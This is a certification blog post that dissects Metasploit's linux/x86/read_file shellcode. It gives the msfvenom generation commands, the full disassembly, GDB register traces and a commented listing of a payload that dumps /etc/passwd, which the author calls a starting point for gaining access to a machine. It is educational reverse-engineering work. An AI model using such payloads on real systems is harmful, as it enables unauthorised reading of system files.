Analyzing Metasploit’s linux/x86/read_file payload

By Kevin Kirsche, August 28, 2018, SLAE-x86

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 5.2
Github repo: https://github.com/kkirsche/SLAE


Introduction

Hey everyone! Today, we’re going to keep moving forward with our shellcode analysis work. Like last time, instead of writing our own assembly code, we’re going to analyze someone else’s work.

Requirements

  • Take at least 3 shellcode samples created using msfvenom for x86 Linux
  • Use GDB, ndisasm, and/or libemu to dissect the functionality of the shellcode
  • Present your analysis

As we said before, this post doesn’t cover all of assignment 5. Instead, it discusses the second of the three shellcode samples generated using msfvenom for x86 Linux, and I’ll write another article to cover the final payload. With that in mind, we can still meet the other two goals here.

Our shellcode

So to get started, I had to choose what shellcode I was going to analyze. After looking through msfvenom’s payloads, I found one which seemed like it’d be interesting — the linux/x86/read_file payload by hal.

I think this one will be interesting to review as I wanted to focus on topics which we didn’t explicitly cover in the SLAE course, such as reading file contents using NASM.

If we take a look at what options we have, we see there are a fair number of them:

[Screenshot: msfvenom options for the linux/x86/read_file payload]

Looking at these, there are a number of advanced options which we won’t be working with. Instead, we’ll focus on FD (the file descriptor to write to) and PATH (the path of the file whose contents we’ll dump).

In our case, we’ll stick to FD 1 (stdout) for our file descriptor. This will simplify the setup required to analyze the shellcode. We do need to set the path though. We’ll dump /etc/passwd, as that’s often a good starting point when we are trying to get access to a machine.

Let’s dig into our shellcode though!

Libemu

We’ll start off by analyzing the payload in libemu, which provides the sctest binary for analyzing what a payload does. We won’t cover the options again, since we went through them in the first shellcode analysis post. The basics are that we’re enabling verbose mode, reading the payload from stdin, and running for up to 10000 steps. If we’re lucky, this will give us pseudocode to start our analysis with.

msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000

Sadly, like last time, we don’t get any pseudocode. If we take a look at the execution graph, hopefully we’ll get a bit more. Realistically, I expect we’ll need to drop into ndisasm and walk through the assembly at a lower level to really analyze this.

msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000 -G read_file.dot && dot read_file.dot -T png > read_file.png

Sadly, this gives us an empty image. We need to drop directly into the raw assembly language instructions instead.

ndisasm


~ $ msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | ndisasm -u -
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 73 (iteration=0)
generic/none chosen with final size 73
Payload size: 73 bytes
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
0000003E 657463 gs jz 0xa4
00000041 2F das
00000042 7061 jo 0xa5
00000044 7373 jnc 0xb9
00000046 7764 ja 0xac
00000048 00 db 0x00

There we go. With a reasonably solid background in assembly, this should be easier for us to understand.

First function

This payload works a bit differently from the shell_find_tag payload we worked with in our last analysis: we don’t immediately begin our first function. Let’s dig into what we mean by looking at a subset of the instructions:


00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
...
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
...

If you’ve done much shellcoding before, you should recognize this JMP, CALL, POP sequence, which we use to find where an item (like the path to our file) is located in memory without relying on hard-coded addresses.

First, we take a short jump from 00000000 to 00000038. We then call 0x2, which brings us back up to the mov eax,0x5 instruction and pushes the return address, 0000003D, onto the stack. We can see this in GDB:

[Screenshot: GDB after our function call]

Here you can see the assembly before we execute the call. We then use stepi to step into the function, which pushes the address of the next instruction onto the stack as our return address. Examining the stack verifies that this is in fact what happened: the return address points at the bytes ndisasm showed as the das instruction, which are really the start of our path string.
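The jump and call targets described above can also be checked by hand from the raw bytes. Here’s a minimal Python sketch of that arithmetic. The helper names short_jmp_target and near_call are hypothetical and exist only for this illustration; the one assumption is the standard x86 rule that a relative branch is measured from the end of the instruction.

```python
import struct


def short_jmp_target(addr, insn):
    """Target of a 2-byte `EB rel8` short jump located at addr."""
    assert insn[0] == 0xEB and len(insn) == 2
    (rel8,) = struct.unpack("<b", insn[1:2])  # signed 8-bit displacement
    return addr + len(insn) + rel8


def near_call(addr, insn):
    """Return (target, pushed_return_address) for a 5-byte `E8 rel32` call."""
    assert insn[0] == 0xE8 and len(insn) == 5
    (rel32,) = struct.unpack("<i", insn[1:5])  # signed little-endian 32-bit displacement
    return_address = addr + len(insn)          # address of the byte after the call
    target = (return_address + rel32) & 0xFFFFFFFF
    return target, return_address


# Offsets and bytes taken from the ndisasm listing
jmp_target = short_jmp_target(0x00, bytes.fromhex("EB36"))
call_target, return_address = near_call(0x38, bytes.fromhex("E8C5FFFFFF"))

print(hex(jmp_target), hex(call_target), hex(return_address))  # 0x38 0x2 0x3d
```

These are offsets within the payload. In GDB the same values show up relative to wherever the shellcode was loaded.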

Now that we have this on the stack and we’re back at 00000002, we move 0x5 into EAX. This sets up our first system call, SYS_OPEN.


int open(const char *pathname, int flags);

We then pop the return address into EBX, giving us a pointer to our PATH variable from msfvenom in EBX.

[Screenshot: the PATH variable is in EBX]
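To convince ourselves that EBX really points at our path, we can decode the bytes that follow the call instruction. ndisasm tried to disassemble them as das, jz, jo, and so on, but they are plain ASCII. This is a small Python sketch, with the bytes copied from the listing at offsets 0x3D through 0x48:

```python
# Bytes at offsets 0x3D..0x48 in the ndisasm listing
data = bytes.fromhex("2F6574632F70617373776400")

# The string ends at the first null byte, just as open() will read it
path = data.split(b"\x00", 1)[0].decode("ascii")

print(path)                  # /etc/passwd
print(0x3D + len(data))      # 73, the payload size msfvenom reported
```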

We then XOR ECX with itself so that it’s 0x0, which is the value of the O_RDONLY flag. Finally, we trigger interrupt 0x80 to make the system call.

This leaves our registers looking like so after each instruction:

Address   Instruction     EAX    EBX        ECX         EDX      EDI
00000002  mov eax,0x5     0x5    Unknown    Unknown     Unknown  Unknown
00000007  pop ebx         0x5    0x8048091  Unknown     Unknown  Unknown
00000008  xor ecx,ecx     0x5    0x8048091  0x0         Unknown  Unknown
0000000A  int 0x80        0x3    0x8048091  0x0         Unknown  Unknown

You’ll notice how after we trigger the interrupt, our value in EAX changed from 0x5 to 0x3, which is the return value of our call to open. We can read the open manpage for more information about the return value:


The return value of open() is a file descriptor, a small, nonnegative
integer that is used in subsequent system calls (read(2), write(2),
lseek(2), fcntl(2), etc.) to refer to the open file. The file
descriptor returned by a successful call will be the lowest-numbered
file descriptor not currently open for the process.

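So we successfully called open! Descriptors 0, 1, and 2 are normally already taken by stdin, stdout, and stderr, so the lowest free descriptor is 3, which matches the 0x3 we see in EAX. This is a good start.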
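The “lowest-numbered file descriptor” rule from the manpage is easy to see for ourselves. The sketch below is only an illustration in Python, not part of the payload: lowest_free_fd_demo is a hypothetical helper, and it opens os.devnull simply because that file is always present.

```python
import os


def lowest_free_fd_demo(path=os.devnull):
    """Open, close, and reopen a file to show descriptor numbers being reused."""
    first = os.open(path, os.O_RDONLY)    # lowest free descriptor
    second = os.open(path, os.O_RDONLY)   # next lowest, since first is taken
    os.close(first)                       # free the lower number again
    reused = os.open(path, os.O_RDONLY)   # gets first's number back
    os.close(second)
    os.close(reused)
    return first, second, reused


first, second, reused = lowest_free_fd_demo()
print(first, second, reused)
```

Whatever numbers are printed, reused should equal first, because that was the lowest descriptor not in use at the time of the third open.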

Second Function

Now that we have our file descriptor, we can start the second function:


0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80

We first move the opened file descriptor from EAX into EBX, as it’ll be the first argument to our second function. We then move 0x3 into EAX, which is the value representing the SYS_READ system call. (It’s a coincidence that the descriptor and the system call number are both 0x3 here.)


ssize_t read(int fd, void *buf, size_t count);

So we already have int fd covered by putting the file descriptor in EBX. We then copy the stack pointer, ESP, into EDI and subsequently into ECX, giving us a pointer to a buffer at the top of the stack. Finally, we move 0x1000 (4096 bytes) into EDX as our count and trigger our interrupt.

Address   Instruction     EAX    EBX        ECX         EDX      EDI
00000002  mov eax,0x5     0x5    Unknown    Unknown     Unknown  Unknown
00000007  pop ebx         0x5    0x8048091  Unknown     Unknown  Unknown
00000008  xor ecx,ecx     0x5    0x8048091  0x0         Unknown  Unknown
0000000A  int 0x80        0x3    0x8048091  0x0         Unknown  Unknown
0000000C  mov ebx,eax     0x3    0x3        0x0         Unknown  Unknown
0000000E  mov eax,0x3     0x3    0x3        0x0         Unknown  Unknown
00000013  mov edi,esp     0x3    0x3        0x0         Unknown  0xffffd190
00000015  mov ecx,edi     0x3    0x3        0xffffd190  Unknown  0xffffd190
00000017  mov edx,0x1000  0x3    0x3        0xffffd190  0x1000   0xffffd190
0000001C  int 0x80        0xd3a  0x3        0xffffd190  0x1000   0xffffd190

With our function called, we see that EAX holds a positive value, which is the number of bytes that were read. In our case, that’s 3386 decimal or 0xd3a hex.
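One thing worth noticing is that the payload issues a single read with a count of 0x1000, so it can return at most 4096 bytes no matter how large the file is. Our /etc/passwd fit comfortably, but a bigger file would be cut off. Here’s a rough Python sketch of that behavior using a throwaway temporary file; open_and_read is a hypothetical helper, and the 5000-byte file is just test data.

```python
import os
import tempfile


def open_and_read(path, count=0x1000):
    """One open() plus one read() of at most `count` bytes, like the payload."""
    fd = os.open(path, os.O_RDONLY)
    try:
        return os.read(fd, count)
    finally:
        os.close(fd)  # the payload skips this and simply exits


# Build a 5000-byte file, which is larger than the 0x1000-byte count
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"A" * 5000)

data = open_and_read(tmp.name)
os.unlink(tmp.name)

print(len(data))  # 4096: the read stops at the requested count
```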

Third Function


0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80

This one is nice and short. We move the number of bytes we read into EDX, move 0x4 (the SYS_WRITE system call) into EAX, and then move 0x1 into EBX, which is the FD option from msfvenom. In our case, that’s stdout. ECX still points to our buffer from the read call, so we can trigger the interrupt to write the contents to stdout.

Address   Instruction     EAX    EBX        ECX         EDX      EDI
00000002  mov eax,0x5     0x5    Unknown    Unknown     Unknown  Unknown
00000007  pop ebx         0x5    0x8048091  Unknown     Unknown  Unknown
00000008  xor ecx,ecx     0x5    0x8048091  0x0         Unknown  Unknown
0000000A  int 0x80        0x3    0x8048091  0x0         Unknown  Unknown
0000000C  mov ebx,eax     0x3    0x3        0x0         Unknown  Unknown
0000000E  mov eax,0x3     0x3    0x3        0x0         Unknown  Unknown
00000013  mov edi,esp     0x3    0x3        0x0         Unknown  0xffffd190
00000015  mov ecx,edi     0x3    0x3        0xffffd190  Unknown  0xffffd190
00000017  mov edx,0x1000  0x3    0x3        0xffffd190  0x1000   0xffffd190
0000001C  int 0x80        0xd3a  0x3        0xffffd190  0x1000   0xffffd190
0000001E  mov edx,eax     0xd3a  0x3        0xffffd190  0xd3a    0xffffd190
00000020  mov eax,0x4     0x4    0x3        0xffffd190  0xd3a    0xffffd190
00000025  mov ebx,0x1     0x4    0x1        0xffffd190  0xd3a    0xffffd190
0000002A  int 0x80        0xd3a  0x1        0xffffd190  0xd3a    0xffffd190

This returns the number of bytes written to the file descriptor in EAX. In our case that’s 0xd3a, so the full file was written.
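To tie the open, read, and write steps together, here’s a loose Python equivalent of what we’ve traced so far. It’s a sketch rather than a translation of the shellcode: dump_file is a hypothetical helper, the temporary file stands in for /etc/passwd, and a pipe stands in for stdout so that we can capture what gets written.

```python
import os
import tempfile


def dump_file(path, out_fd=1, count=0x1000):
    """Mirror the payload's syscall sequence and return write()'s result."""
    fd = os.open(path, os.O_RDONLY)       # eax=5, ebx=path, ecx=0
    try:
        data = os.read(fd, count)         # eax=3, ebx=fd, ecx=buffer, edx=0x1000
        return os.write(out_fd, data)     # eax=4, ebx=FD, ecx=buffer, edx=bytes read
    finally:
        os.close(fd)                      # not in the payload, which just exits


# Stand-in input file and a pipe in place of stdout
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"root:x:0:0:root:/root:/bin/bash\n")

read_end, write_end = os.pipe()
written = dump_file(tmp.name, out_fd=write_end)
os.close(write_end)
captured = os.read(read_end, 0x1000)
os.close(read_end)
os.unlink(tmp.name)

print(written, captured)
```

Calling dump_file("/etc/passwd") with the default out_fd of 1 would print the file to stdout, which is what the payload does with FD left at 1.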

Final Function


0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80

This is nice and simple. 0x1 is SYS_EXIT and 0x0 is our exit code, so we exit cleanly.

Commented ASM Code

With a solid understanding of how this worked, let’s comment our assembly code accordingly:


00000000 EB36 jmp short 0x38 ; jump to 0x38 so that we get the address of our file path
00000002 B805000000 mov eax,0x5 ; SYS_OPEN system call
00000007 5B pop ebx ; file path into EBX
00000008 31C9 xor ecx,ecx ; O_RDONLY flag for SYS_OPEN command
0000000A CD80 int 0x80 ; execute SYS_OPEN function
0000000C 89C3 mov ebx,eax ; move the file descriptor which we've opened into EBX.
0000000E B803000000 mov eax,0x3 ; SYS_READ system call
00000013 89E7 mov edi,esp ; Move a pointer to our buffer into EDI.
00000015 89F9 mov ecx,edi ; Move the pointer into ECX for the buffer argument
00000017 BA00100000 mov edx,0x1000 ; define the size of our buffer
0000001C CD80 int 0x80 ; execute the READ call
0000001E 89C2 mov edx,eax ; Move the size of the file we read into EDX
00000020 B804000000 mov eax,0x4 ; SYS_WRITE system call
00000025 BB01000000 mov ebx,0x1 ; Move the FD msfvenom variable into EBX (where we will write the file to)
0000002A CD80 int 0x80 ; Write the contents out (this is where we see the contents!)
0000002C B801000000 mov eax,0x1 ; SYS_EXIT system call
00000031 BB00000000 mov ebx,0x0 ; 0 return value
00000036 CD80 int 0x80 ; exit cleanly
00000038 E8C5FFFFFF call 0x2 ; Call 0x2 so that we push the location of /etc/passwd onto the stack.
0000003D 2F das ; /
0000003E 657463 gs jz 0xa4 ; etc
00000041 2F das ; /
00000042 7061 jo 0xa5 ; pa
00000044 7373 jnc 0xb9 ; ss
00000046 7764 ja 0xac ; wd
00000048 00 db 0x00 ; null string terminator

And with this, we now understand how this payload works! This is awesome.

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.
